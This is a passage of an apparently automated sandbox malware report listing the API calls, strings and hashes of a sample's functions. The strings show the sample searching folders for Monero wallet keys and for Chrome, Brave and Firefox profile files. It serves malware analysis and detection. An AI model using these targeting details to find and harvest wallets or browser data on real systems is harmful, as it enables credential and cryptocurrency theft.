                                      • StrCmpCA.SHLWAPI(?,00540F70), ref: 00533947
                                      • StrCmpCA.SHLWAPI(?,00540F74), ref: 0053395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00533C67
                                      • FindClose.KERNEL32(000000FF), ref: 00533C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: a76bc3ce10a95df8291c19dfa3e85fa6cb5ed14856b1724a827c0bcc2fa5a391
                                      • Instruction ID: 2aa4c7811a1f0db5873c71f104c5d8ba8f71ba69168498d65b6c5804aff0203d
                                      • Opcode Fuzzy Hash: a76bc3ce10a95df8291c19dfa3e85fa6cb5ed14856b1724a827c0bcc2fa5a391
                                      • Instruction Fuzzy Hash: 58A11272900319ABDB24DF64DC89FEA7779BF94300F048598F60EA6141EB759B84CF62
                                      Function 0052BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00540B32,00540B2B,00000000,?,?,?,005413F4,00540B2A), ref: 0052BEF5
                                      • StrCmpCA.SHLWAPI(?,005413F8), ref: 0052BF4D
                                      • StrCmpCA.SHLWAPI(?,005413FC), ref: 0052BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0052C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: 63b6ac8a1f322d97cbfc599be7af34320acb61ee966939f0a73650f94e2e63df
                                      • Instruction ID: 3648e703c283e95fc738b36295cc707c9e0369311f4b7628d05d45ef8861ac8a
                                      • Opcode Fuzzy Hash: 63b6ac8a1f322d97cbfc599be7af34320acb61ee966939f0a73650f94e2e63df
                                      • Instruction Fuzzy Hash: E0424272900105ABCB14FB70DD9AEEE7B7CBFD4300F408558F946A6181EE34AB49CB96
                                      Function 00534910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 0053492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                      • StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                      • StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00534B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 2e2cb2870a2c5a39d00db665542c4f2384f1c1c2fdd618c190af7559f0b2e318
                                      • Instruction ID: 5af13afaac1e87f725f26a43b1ae3c4fe7f1b2b47af72e4facfa129bd7c4e847
                                      • Opcode Fuzzy Hash: 2e2cb2870a2c5a39d00db665542c4f2384f1c1c2fdd618c190af7559f0b2e318
                                      • Instruction Fuzzy Hash: 2F616872500219BBCB20EBA0DC49FEA777CBF48700F048598F60AA6141EB75EB85CF95
                                      Function 00534570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00534580
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00534587
                                      • wsprintfA.USER32 ref: 005345A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 005345BD
                                      • StrCmpCA.SHLWAPI(?,00540FC4), ref: 005345EB
                                      • StrCmpCA.SHLWAPI(?,00540FC8), ref: 00534601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0053468B
                                      • FindClose.KERNEL32(000000FF), ref: 005346A0
                                      • lstrcat.KERNEL32(?,00F1E938), ref: 005346C5
                                      • lstrcat.KERNEL32(?,00F1DBC0), ref: 005346D8
                                      • lstrlen.KERNEL32(?), ref: 005346E5
                                      • lstrlen.KERNEL32(?), ref: 005346F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 7071e40c5ee7694c46525d77fe9ee0a8a68d232bf191db6648d6f5e6e58f0260
                                      • Instruction ID: 6a9de86c7089ee33fc60b78eeaf90fa4f584a2e1c77aacdd975bdd2d977d2596
                                      • Opcode Fuzzy Hash: 7071e40c5ee7694c46525d77fe9ee0a8a68d232bf191db6648d6f5e6e58f0260
                                      • Instruction Fuzzy Hash: F9516971510319ABC724EB70DC89FEE777CBF54300F408598F60AA2190EB74AB848F95
                                      Function 00533EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00533EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00533EDA
                                      • StrCmpCA.SHLWAPI(?,00540FAC), ref: 00533F08
                                      • StrCmpCA.SHLWAPI(?,00540FB0), ref: 00533F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0053406C
                                      • FindClose.KERNEL32(000000FF), ref: 00534081
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 450961784597ccb1d5ca27b856192200865671161adca80069ed17e00bcaf118
                                      • Instruction ID: d5b6e24bd33660144d8f57a9afa946b33e57409899200550c36e8ae800e9abcf
                                      • Opcode Fuzzy Hash: 450961784597ccb1d5ca27b856192200865671161adca80069ed17e00bcaf118
                                      • Instruction Fuzzy Hash: D45148B2500319BBCB25EBB0DC89EEA777CBB84300F408598F65A96080DB75EB858F55
                                      Function 0052ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 0052ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0052ED55
                                      • StrCmpCA.SHLWAPI(?,00541538), ref: 0052EDAB
                                      • StrCmpCA.SHLWAPI(?,0054153C), ref: 0052EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0052F2C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 6ba8d51fc6cccb4d94cfe31416799e764aec9f96cd2990f6e682448093ccaa29
                                      • Instruction ID: c362b22b84115331709d3efc75ec84e6506b31198a9d3374cadabde70e17e0fe
                                      • Opcode Fuzzy Hash: 6ba8d51fc6cccb4d94cfe31416799e764aec9f96cd2990f6e682448093ccaa29
                                      • Instruction Fuzzy Hash: E6E1F472911119AADB54FB60DC96EEEB738BF94300F4041D9B54B62092EF306F8ACF55
                                      Function 0052F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005415B8,00540D96), ref: 0052F71E
                                      • StrCmpCA.SHLWAPI(?,005415BC), ref: 0052F76F
                                      • StrCmpCA.SHLWAPI(?,005415C0), ref: 0052F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0052FAC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: f2608c5ee5a01a5bde68103885c4635a1d612c423fc54b680747d8e08c7ea605
                                      • Instruction ID: 9cacd7d27e6830a7ab13b6062ebe6958d0fd2871a1b58e4bd651c32590681d96
                                      • Opcode Fuzzy Hash: f2608c5ee5a01a5bde68103885c4635a1d612c423fc54b680747d8e08c7ea605
                                      • Instruction Fuzzy Hash: 80B14471900119ABDB24FF60DC99FEE7B79BF95300F4085A8E44A96191EF306B49CF92
                                      Function 005216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0054510C,?,?,?,005451B4,?,?,00000000,?,00000000), ref: 00521923
                                      • StrCmpCA.SHLWAPI(?,0054525C), ref: 00521973
                                      • StrCmpCA.SHLWAPI(?,00545304), ref: 00521989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00521D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00521DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00521E20
                                      • FindClose.KERNEL32(000000FF), ref: 00521E32
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: c6dd913d898b0cc5fdcefdcbd54d17a1af4e720f090190adbb0e8be45d55d5a3
                                      • Instruction ID: 30f95471bf94332a1b2308ab18bdc4aaf03fa30659b71b8b86903180990783cb
                                      • Opcode Fuzzy Hash: c6dd913d898b0cc5fdcefdcbd54d17a1af4e720f090190adbb0e8be45d55d5a3
                                      • Instruction Fuzzy Hash: DA122572910119ABDB19FB60DC9AEEEBB7CBF94300F404599B14666091EF306F89CF91
                                      Function 0052DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00540C2E), ref: 0052DE5E
                                      • StrCmpCA.SHLWAPI(?,005414C8), ref: 0052DEAE
                                      • StrCmpCA.SHLWAPI(?,005414CC), ref: 0052DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0052E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: e2ba2498f007afa83f9a968d65dbc44180b32036b0b939c158ca9a748ebc6510
                                      • Instruction ID: 729900018c7eb6858d708d082e6d46bcd66026910a21ef6193a99157524ab65a
                                      • Opcode Fuzzy Hash: e2ba2498f007afa83f9a968d65dbc44180b32036b0b939c158ca9a748ebc6510
                                      • Instruction Fuzzy Hash: 8FF1B472814119AADB15FB60DC9AEEEB738BF94300F5041D9B44B62091EF346F8ACF65
